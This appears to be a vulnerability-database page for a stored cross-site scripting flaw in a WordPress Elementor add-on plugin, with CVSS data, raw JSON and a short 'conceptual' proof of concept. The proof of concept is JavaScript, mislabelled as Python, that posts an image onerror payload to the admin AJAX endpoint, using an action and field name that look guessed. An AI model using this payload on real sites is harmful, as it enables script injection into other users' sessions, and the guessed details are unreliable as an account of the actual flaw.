Security Vulnerability Report
中文
CVE-2026-39636 CVSS 6.5 MEDIUM

CVE-2026-39636

Published: 2026-04-08 09:16:34
Last Modified: 2026-04-24 18:06:25

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in livemesh Livemesh Addons for Elementor addons-for-elementor allows Stored XSS.This issue affects Livemesh Addons for Elementor: from n/a through <= 9.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Livemesh Addons for Elementor <= 9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Conceptual PoC for Stored XSS in Livemesh Addons for Elementor This script demonstrates how an attacker might inject a payload. --> <script> // Attacker constructs a malicious payload var payload = '<img src=x onerror=alert(1)>'; // Simulating a POST request to a vulnerable endpoint (e.g., via AJAX) var formData = new FormData(); formData.append('action', 'save_elementor_widget'); formData.append('widget_title', payload); // Vulnerable field fetch('/wp-admin/admin-ajax.php', { method: 'POST', body: formData, credentials: 'include' }).then(response => console.log('Payload injected')); // When an admin views the page, the alert triggers. </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39636", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:34.270", "lastModified": "2026-04-24T18:06:24.707", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in livemesh Livemesh Addons for Elementor addons-for-elementor allows Stored XSS.This issue affects Livemesh Addons for Elementor: from n/a through <= 9.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/addons-for-elementor/vulnerability/wordpress-livemesh-addons-for-elementor-plugin-9-0-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}